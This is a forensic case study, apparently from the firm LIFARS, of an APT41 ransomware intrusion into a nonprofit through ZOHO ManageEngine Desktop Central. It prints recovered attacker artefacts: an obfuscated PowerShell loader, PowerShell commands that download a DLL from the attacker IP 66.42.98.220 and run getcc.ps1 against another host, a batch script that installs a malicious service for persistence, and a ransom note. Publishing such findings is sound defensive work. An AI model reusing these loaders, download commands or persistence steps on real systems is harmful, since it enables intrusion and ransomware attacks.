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APT41 — A SPY WHO STEALS OR A THIEF WHO SPIES 


An advanced persistent threat (“APT”) is, typically, either a nation-state actor and aims 
at benefiting its state through sabotage, espionage, or industrial espionage; or a 
cybercriminal and its aims are to steal money through theft, fraud, ransom or blackmail. 


The Chinese-based threat actor APT41 blurs the lines: known to have run financially- 
motivated operations against the videogame industry as early as 2012, it got its notoriety 
in 2013 when it started engaging in state-sponsored campaigns, notably the theft of 
digital certificates which were later used to sign malware [1] [2]. 


Since December 2019, we have seen this threat actor exploiting vulnerabilities in products 
such as ZOHO ManageEngine Desktop Central and Citrix Application Delivery Controller. 
Within two to three weeks of the initial compromise the final attack, the encryption of 
systems, is launched and a ransom is demanded. 


THE INVESTIGATION 


This case study is based on our most recent investigation into one of APT41’s operations 
against a major global nonprofit organization. Our client contacted us at the end of March 
2020 after discovering the ransom notes, shown in Figure 1, on several of its servers, 
some of which had been rendered inoperable. 


Hello. Your company's server hard drive was encrypted by us. 
We use the most complex encryption algorithm (AES256).Only we can decrypt. 


Please contact us: @privatemail.com 
(Please check spam,Avoid missing mail) 


Identification code: (Please tell us the identification code) 

Please contact us and we will tell you the amount of ransom and how to pay. 

{If the contact is fast, we will give you a discount.) 

After the payment is successful, we will tell the decrypt password. 

In order for you to believe in us, we have prepared the test server.Please contact us and we will tell the test server and decrypt the password. 
Please do not scan encrypted hard drives or attempt to recover data.Prevent data corruption. 

How to buy and pay for Bitcoin: 

http://www. Localbitcoins.com 


Or you can google search "How to buy Bitcoin" 
If you know other trading websites better. 


Tips: 
If we don't respond in three days. Please contact an alternate mailbox: @cock. li 


We will enable the alternate mailbox only if the first mailbox is not working properly. 


Figure 1 Ransom note left on systems 


Initially, the ransom note looked like the ones left by the TimisoaraHackerTeam (see [3] 
for an example of such note). However, differences started to cast doubt on that 
attribution. 
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Our client provided the virtual files of a server that had been encrypted. We examined it 
and determined that: 


e The threat actor used a commercial, off-the-shelf application, JetIco BestCrypt; 
e The lateral movement to this computer originated on a domain controller; 

e The system disk was left intact, the other drives were encrypted; 

e The connection used a service account. 


We then requested a forensic image of the domain controller. 


THE BASE 


Quickly, it became clear that that domain controller was the “base” from which the threat 
actor operated. 


In the logs, we identified a long, base64 encoded PowerShell script. While this is not 
automatically malware, this also makes us suspicious. We show the decoded string in 
Figure 2. The reader will find the usual signs of maliciousness: several layers of encoding 
and obfuscation. In this case, we had the following sequence: base64 — base64/gzip — 
base64/xor. 


} $s=New-Object 
go I0.MemoryStream(, [Convert] ::FromBase64String ("H4sIAAAAAAAAAK1IXbXOiyhL+HH8FH1Kllsag+BL31FYtIggK 
a g RAHXxJSeV4mVEZPA+qHhZ/ / s ZUHOyZ5N7t+peqyxmhu6e 7mee 7m1 Ugo SUFLsWkg IbEHc6i BM38I1WqxXQ7DARE£CW+1Uub1L 
f dQvpwPXhyAXs14sF 4M245BkhB/ 1W6mRmx4ROV2 b8QvXmCnENSJYpILAjuNQfXmpnRTLKV+YmzAi28&gdwSePIC2gZ3gjSpP 
— dBgOA89w/ ecvX¥5g0j]0GPzvPGCCA6SYBnQhck15 rxnVhsQQzuHs0dsB DxF 3H70hj] BwDTgRSxjDGULA6J9038nB paRR9BQQ+ 
iiSvnPP8vVp7vme 40NUgMm1] bKaJQh4DRvCcpX4UcO31LIQVMqS a8VBEmxQY+H6VKSxXL7yXCtelst+/ 16iUyJIZRwHJSHmvy s9 
61TKeD]F2NBnDMt14inf7+n5mf£j25028+s j1Q0E PwEYIDUAXx3rVAOUAN3 4ZAARusSVk7w8 flouYqdiAFKY5+4+oL19sErqNn 
Z6KYR1LbP£pd+0+V2RwulL7u0qV90pYaoriav3Cid+BOyp4czaHw/ nF +3 fkquLfLwSr1ln6UPqCqDSBwDAReEEMb 3HVdLNzdP 
“xRDgeCrTIHELvasgEWSck71ISBgj]jLj]1OLU1B9/ ud8ztteNZP6p4aaV62Lzv14zn58IZ70wLWESzfVO0US+EqLmbroBnHt+/v 
NsGIKN64Nh5hueal0JX/ nozMAGggKPx1VMxn5WypcXwB 5e0CnngD79qsZ6LnrTHZydoyl 87gn2C10i+rMz5zOs1lAVEAh7G 
7zZzZHNL3d4DQDV+1Lamxx3 £N SzmUGGk1SJ6YpznOrTqjAgMCuB 7S fuJdxXdIqceylj+x1l0phciljARdzT1XP4D0sjUT+Dhj Ug 
ufLoZBUONguQbMUakTvGuD9 aaGztwF 80e YMAaE OOWWwpTO+E 7ySY6GinDOxXf£83P6GoONFSDBCyHwsSHRRhThooL] mxDKqoJvh 
ALVSH9y+5Ssk5KXKsriC93cxo TQIUBQGhO6GyNc18r1X4j 3v7n3c4n5yUOmBpeDrBSJ+DTIUJ4uhasVXy5f£37AskIsRRo2LA2 
SgIKDbVosyVilTD2kkZNJulolH7I7j157V8H+P/ 1TEsSal4VsKBI1pstjjlyfFGmDOM2+khFVItQF IcieVOOY] dCPvHYNVM 
vXbTDoOW9 j NeSXsQnQ2E/ pP1WFHBdx+1£7J3z12Z+ahas 4F rmeOuDavd 1lwuzwv 7ARCH/ OCP7 4U9SE4yx3kM3 9AcHuWw3YcRcsRe 
tAoQdgOMdsotdUsjnSM1LnU2ZVBWEVsOmzNuLJ9aLDQSNq+QNpusbT1iqak5CXGcAuWoxXX+cqeogs17RKY/ d4mX¥RnkQPHfvU 
yj]i5j)XE4qpm0XXXto7XkDtZ SF IN+JY+w3Shd0G 1levilsW7WPB3uePI 41tKKmht fOMr/ NCDVhKFohOpfjbmxkTCiS6wBxs UK 
47FtfouMt+is3+qqmo2tg15bT ]Btn1lGkrA/ RocDcywzsVxs6yGOBF faZd2dRckHyaSu2Vp 9TPclVp2Zi PeynB 8X P+ 1 4bd4eg 
89Dvb2ZKj+j] qnelNr3G8z4ta5H8N27TFSZ/zj0/ eeSVLhf£sPKGLYQBhJDx2szlJa7?xfiwlRYzasduPW21rrkCt Z4pkHlevs 
oj TbfWdkKsj LebhVCMFiXNIj T4gWmM72gzak9m8 PxrRomqNQo8+CtpgkvYOpUy0us3pHDO0013S 
agmSEK1LiHVV1Lnj s5weZwv8 ZyazO0NeeWOuh405 zB6CdKJKq31ix59n1l qN3Txd2eNqMl1 9LrCknEmdkTSF ]CPKmV 006biJ29f 
FTPvVYZNVT] 9Ig2gaCf9qkrG+ aHY6q3evrimrej]2QqEOUak8g 8mG3 6p+NqaxXdVZgF 1lp7nil ONHs8nxXFjd3BuJrAndNhNq2 0D 
qwepduSZa3bzv6rgPclul+3BkGk5V5akpL2j 4pUPF 6cCQS6vdNolsmyY++ho82nhqs0+X4EbF/ oysPeHj} Jxd9LU7xmRS2uT 
Ox7yCHqG 5SmaDsReKzZFhj PMF 9fVxw/ FparhAp70gQgseallVoaMqTY1 £fx1U00L+1pE/ 0c 7BgDG/ NUXciicMJ8Jpod0JJ2No 
t6W2o0 4wj]w8eJgvmEduzR8 fogTzNJOGQibnXD0i Ix4UXG1UYMTM3 PbE 30nJuteWOgmF Tha 7nelDRVBYmpzhp8ZlsuQuRsSev 
Rpsgxv3FMb+z/ yDw8w4i 4q3e4CqDClit+XqtV83v/ 7c3T7 £EHS2qe9ze/MI7ZGdfLavVbzZG+8qlmtNj2TEydaAuJLhBuZ6/X 
BBzF3akGng 5hqVysed8yulfQBxV4n7zmvRpiEMrLxxt+qsDwwW3cubl 6xpfTHAt+ploejKvEmiLulcOxmutkUzcU lwmuPdRXx8 
8mWNw6u/ALEEVoOO2ZdYI8UiRJ5s82WS39PixMEG aVN3P1VL1658n7nWCxU/WCEpz6Hvg/HsBPm/ 53aHPwiv7?sDbrCoY/ xqp 
bK3001YUO08WO0/ cE/ 76ABHXUHAVWTRHd7VAxJ 8qxd1lbuTWqhMAuiVuD+EHce 4 £DohGrh75X YS £fOLmDh/ fnOnDoZ 7VvVKXOKMAC 


uH2+GwemZinA/ VRuujCSC+0 lvwF rmWHUZzwOARA=="));IEX (New-Object I0.StreamReader (New-Object 
IO.Compression.GzipStream($s, [IO.Compression.CompressionMode] ::Decompress))}.ReadToEnd({); 


Figure 2 Decoded PowerShell script found in logs 


Ultimately, the result is a binary string that contains executable code, which is copied to 
memory and executed. This string is shown in Figure 3. It contains two important 
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indicators: the user agent string “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; 
Win64; x64; Trident/6.0)” and the IP address “176[.]123[.]3[.]104”. 


Figure 3 Binary string copied to memory and executed 


In the same event log, we found a second PowerShell script with the exact same content, 
with the difference of the user agent string, which takes the new value “Mozilla/5.0 
(compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; BOIE9;ENUS)”. 


| The threat actor had achieved persistence through the use of a scheduled task called 
| a “Windows Update Medic Service Daily” set to execute every day. At the time of the 
acquisition, the executable was no longer present on the domain controller. 


THE TOOLKIT 


On the same domain controller, we found several tools dropped by the attacker at various 
stages of its attack. In addition to the JetIco BestEncryption, we identified a threaded 
pinger called “MiPing” present in \Windows\SysWOW64, and a tunneling client similar to 
netcat, called “NATBypass”, present in \PerfLogs. Interestingly, in the same PerfLogs 
directory we found the PsExec.exe file. We have no evidence this latter was executed. 


The “MiPing” threaded pinger was executed in the early stages. It takes a list of 
destinations, either IP addresses or hostnames, and returns a file called “o.txt” that 
contains all the entries that responded. 


The evidence left on the server shows that the threat actor first dumped the computer 
lists from Active Directory, then extracted the hostnames from that list, that were used 
as the input to “MiPing”. The names present in the output file correlate with the evidence 
of lateral movement present both on the servers and in the network logs. 


The “NATBypass” tool creates a tunnel between two computers, bypassing all firewalls 
and access controls. We correlated the execution on the domain controller with outbound 
connections on TCP/53, to the same IP address “176[.]123[.]3[.]104”. The execution of 
“NATBypass” also correlates with a RDP connection on the domain controller, indicating 
that the threat actor likely used “NATBypass” to access the local server from the outside. 
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THE POINT OF ENTRY 


In parallel to the analysis of the two systems above, our DFIR team deployed the VMWare 
Carbon Black Defense! agent on our client’s computers. On one machine, a virtual server 
hosted in the cloud, the agent identified several malware files and communications with 
the already known IP address “176[.]123[.]3[.]104”. 


The first malware scans identified several files of interest, and an IOC scan identified 
several more. Among the malware and files identified are trojans identified as “SWRORT” 
and “DIPLE”, based on the penetration test framework CobaltStrike. 


In addition to executable files (EXE and DLL), the malware scan identified an HTML 
application (HTA), a batch script (BAT), and a cache file that belongs to the tool 
CERTUTIL, a native Microsoft application. 


CERTUTIL, when it downloads content from the Internet, creates two files: a “content” 
file with the actual content and a “metadata” file that contains the information related to 
the transfer. In our case, the metadata, shown in Figure 4, shows the URL from which 
the malware file was retrieved, and provide another IP address “91[.]208[.]184[.]78”. 


Gloslie sa) akakana doje eNe meo Tole) too) goho) © allel {979} foie) fofok doko) colle) tioa sel [See e aa oboooaanaa | 
SOUCuOSO 20 DD BOO) OL BO OR Oo (O0! G4 ta a2 99 fo ds 0° | ajo seme e Pepe all 
00000060 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 52258 

00000070 00 b4 14 00 68 00 74 00 74 00 70 00 3a 00 2f 00 pac dislatesie cols oifc 
oo000080 2f 00 39 00 31 00 2e 00 32 00 30 00 38 00 2e 00 (iets EE 
oo0000090 31 00 38 00 34 00 2e 00 37 00 38 00 2f 00 32 00 ae et Savi A 
o00000a0 2e 00 65 00 78 00 65 00 00 00 22 00 35 00 65 00 Bickers 
o00000b 36 00 37 00 327 00 66 00 el) 00) 38 00) 2d 00 S17 00 Geha 
000000c 34 00 62 00 34 00 30 00 30 00 22 00 00 00 4 


Figure 4 Metadata related to the malware content (certutil) 


A reference to the batch script is found in the artifacts from another native tool, the 
Background Intelligent Transfer Service (BITS). Two files, of which one is shown in Figure 
6, contains the URL from which the batch file was retrieved. This provides a third IP 
address “66[.]42[.]98[.]220”, and the destination port 12345. 


The content of the batch script is shown in Figure 5. Notably, it creates a service called 
“Storage Sync Service”, which calls the DLL “storesyncsvc.dll”, identified as malware. 
This, in effect, achieves persistence. 


1 https://www.carbonblack.com 
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@echo off 

set "WORK_DIR=C: \Windows\System32" 

set "DLL_NAME=storesyncsvc.dLll" 

set "SERVICE_NAME=StorSyncSvc" 

set "DISPLAY_NAME=Storage Sync Service" 

"DESCRIPTION=The Storage Sync Service is the top-level resource for File 
Sync. It creates sync relationships with multiple storage accounts via multiple 
sync groups. If this service is stopped or disabled, applications will be 
unable to run collectly." 


sc stop %SERVICE_NAME% 
sc delete %SERVICE_NAME% 

mkdir %WORK_DIR% 

copy "%~dpO@%DLL_NAME%" "%WORK_DIR%" /Y 

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v 
"%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f 

sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k 
%SERVICE_NAME%" type= share start= auto error= ignore DisplayName= 
"%DISPLAY_NAME%" 

SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/ 
restart/60000 

sc description "%SERVICE_NAME%" "%DESCRIPTION%" 

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f 
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v 
"ServiceDLL" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f 

net start "%SERVICE_NAME%" 


Figure 5 Content of the batch script 


OUDOOS SO BOON OS LAU 0 VON OOS rda oGe hii GE Dr Sa SAC ac a 6.VwoQZc. . 
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00000600 63 00 5c 00 42 00 49 00 54 00 33 00 42 00 41 00 oN io E gu EE aia 
00000610 42 00 2e 00 74 00 6d 00 70 00 00 00 00 00 00 00 PE MEDE A a 1 os 
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00000630 O00 43 00 3a 00 5c 00 00 O00 32 00 00 00 5c 00 5c Cre FON ave mite ah « % 
00000640 OO 3f 00 Sc 00 56 00 6£ O00 6c 00 75 00 6d 00 65 BoNaVicOls E 
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ODUDOSsU OO COS UO TOO MOOS: eb 8e be SE EE EE BE EE EEE Eoee ee 
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Figure 6 BITS queue file 


The examination of the PowerShell event logs shows the same download we found in the 
BITS artifacts, as well as the download of the “storesyncsvc.dll” file, shown in Figure 7. 
The same logs show the execution or attempted execution of a PowerShell script called 
getcc.ps1, shown in Figure 8. This script was not present on the file system at the time 
of the acquisition. The argument contains the IP address “119[.]28[.]226[.]59”. 
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Event number 
Creation time 
Written time 
Event level 
Computer name 
Source name 

Event identifier 
Number of strings 


SERINE AE 
hat sehigts ft) Z 
Serangs 3 


NewProviderState=Started 


SequenceNumber=1 


HostName=ConsoleHost 


HostVersion=4.0 


18354 


Mar 09, 2020 17:01:53.000000000 UTC 
Mar 09, 2020 17:01:53.000000000 UTC 


Information (4) 


PowerShell 

0x00000258 (600) 

3 

Alias 

Started 
ProviderName=Alias 


HostId=1f£78d09-7e08-4747-aal7?-66abfcec4f6b 
HostApplication=powershell $client = new-object 


System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvec.dll','c 


:\Windows\Temp\ storesyncsvc.d1ll1"} 


EngineVersion= 
RunspaceId= 
PipelineId= 
CommandName= 
CommandType= 
ScriptName= 
CommandPath= 
CommandLine= 


Figure 7 Download of "storesyncsvc.dll" 


Event number 
Creation time 
Written time 
Event level 
Computer name 
Source name 

Event identifier 
Number of strings 
String: 1 

Sit rangi 2 


: Mar 11, 2020 15:05:17.000000000 UTC 
: Mar 11, 2020 15:05:17.000000000 UTC 


18523 


Information (4) 


PowerShell 
0x00000258 (600) 
3 


: Alias 


Started 


Strind 3 ProviderName=Alias 


NewProviderstate=Started 


SequenceNumber=1 


HostName=ConsoleHost 

HostVersion=4.0 
HostId=2a5e626a-9a3a-—491f-b57d-2£81622a9b33 
HostApplication=powershell -file getcc.psl 1 http://119.28.226.59:5000/dd 
EngineVersion= 

RunspacelId= 

PipelineId= 

CommandName= 

CommandType= 

ScriptName= 

CommandPath= 

CommandLine= 


Figure 8 Execution of getcc.ps1 


THE INITIAL VECTOR OF COMPROMISE 


During the analysis of the point of entry, it became increasingly clear the ZOHO 
ManageEngine Desktop Central had been abused: we found some of the malware files in 
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the “bin” directory of that application, the PowerShell logs contain a command that 
replaced some strings in the configuration file (Figure 9) and then that restarted the 


application (Figure 10). 


Event number : 18394 


Creation time : Mar 10, 
Written time 2 Mar. 10, 
Event level : Information (4) 


Computer name 


Source name : PowerShell 
Event identifier : 0x00000258 


Number of strings 3-3 
String: 1 : Alias 


SCCINGE S : Started 
ProviderName=Alias 


Siring ss. 
NewProviderstate=Started 


SequenceNumber=1 


HostName=ConsoleHost 
HostVersion=4.0 


HostId=e4666afc-f14a-4e16-8a09-bcab9d43471la 
HostApplication=powershell -Command (gc 


‘Tpowershell 


2020 05:06:24.000000000 UTC 
2020 05:06:24.000000000 UTC 


(Get-Process 


DesktopCentral).Path\..\..\webapps\DesktopCentral\WEB-INF\web.xml"} -replace "cewolf', 


‘patched’ | Out-File -encoding ASCII 'powershell 


(Get-Process 


DesktopCentral).Path\..\..\webapps\DesktopCentral\WEB-INF\web.xml'; 


EngineVersion= 
RunspacelId= 
PipelineId= 
CommandName= 
CommandType= 
ScriptName= 
CommandPath= 
CommandLine= 


Figure 9 Replacement of strings in the configuration file of ManageEngine Desktop Central 


Event number 18402 


Creation time Mar 10, 
Written time Mar 10, 
Event level Information 


Computer name 


Source name Powershell 
Event identifier 0x00000258 


Number of strings 3 
Strang. 1 Alias 


Strang. 2 Started 
ProviderName=Alias 


String: 3 
NewProvidersState=Started 


SequenceNumber=1 


HostName=ConsoleHost 
HostVersion=4.0 


HostId=e2862263-cf61-4aed-90fd-e859986d72db 


2020 05:06:27.000000000 UTC 
2020 05:06:27.000000000 UTC 


HostApplication=powershell -Command net stop DesktopCentralServer ; net start 


DesktopCentralServer 
EngineVersion= 
RunspacelId= 
PipelineId= 
CommandName= 
CommandType= 
ScriptName= 
CommandPath= 
CommandLine= 


Figure 10 Restart of the Desktop Central service 


IFARS 


your digital world, secured 


244 Fifth Avenue, Suite 2035, New York, NY 10001 
LIFARS.com (212) 222-7061 info@lifars.com 


However, we did not find anything that would explain how these came to be, at least not 
on the server itself. 


In our threat intel feeds, we found multiple references, for example [4] and [5],to two of 
the IP addresses mentioned above. The corresponding articles had the same tools, the 
same names and the same methodology as the one we were investigating. They also all 
referred to CVE-2020-10189, that affects ZOHO ManageEngine Desktop Central before 
version 10.0.474 [6]. In [5], FireEye attributes attacks with indicators identifiable to 


APT41. 
INDICATORS OF COMPROMISE 
IOC Type 
176.123.3[.]104 IP 
User-Agent 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; BOIE9;ENUS) string 
User-Agent 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0) AA 
66.42.98[.]220 IP 
74.82.201[.]8 IP 
exchange.dumb1[.]com Hostname 
91(.)208.184(.)78 IP 
119[.]28[.]226[.]59 IP 
3e856162c36b532925c8226b4ed3481c md5 
f87ab3349 1ee84c579cab9d87c7064a27a8ce37 1 shal 
d854f775ab1071eebadc0eb44d8571c387567c233a7 1d2e26242cd9a80e67309 sha256 
51b3c05dfbdec9b322fb23e5122e91e1 md5 
689f65ed8be272589de45fce634ceed45a5c8da8 shal 
9ca7aed35efb4197 1855154a04f604fcd1027ee41e04f057c295778c4d2f91dc sha256 
5909983db4d9023e4098e5636 1c96a6f md5 
0b83939510bd31939c91370c53fab25aa286ba08 shal 
f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaaic sha256 
f88540e3cce5f236fad19b5a03d4df32 md5 
€317d840aeb62c8c508d12c00c2d92ea5da559f6 shal 
€484374904253d9d1dab466b13de6058ec79ad28c023bb1920775d6eeac36505 sha256 
343542cb50da23a31b462b14963061ad Md5 
d846ab0e7e46e0999ad0f3a98bc1 22df33fa3f67 Shai 
1342924ce7d5368e4e93a6fea4ef5c08e8baa94e511e83af91a4fb21dd76f9a8 Sha256 
Storage Sync Service String 
Windows Update Medic Service Daily String 
3fdd9a45682dfe0b591771c8e8739971 MD5 
a6dca7c1b90bf1c2d5981b2e899ac74d371882ee SHA1 
4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff SHA256 
88ef5955f8fa58e141da85580006b284 MD5 
44759a6597bad3a287a7b82724a763208c599135 SHA1 
806761850d19f0cc9f41618e74db471e85c494e952f900f827c1779f2d1c4d31 SHA256 
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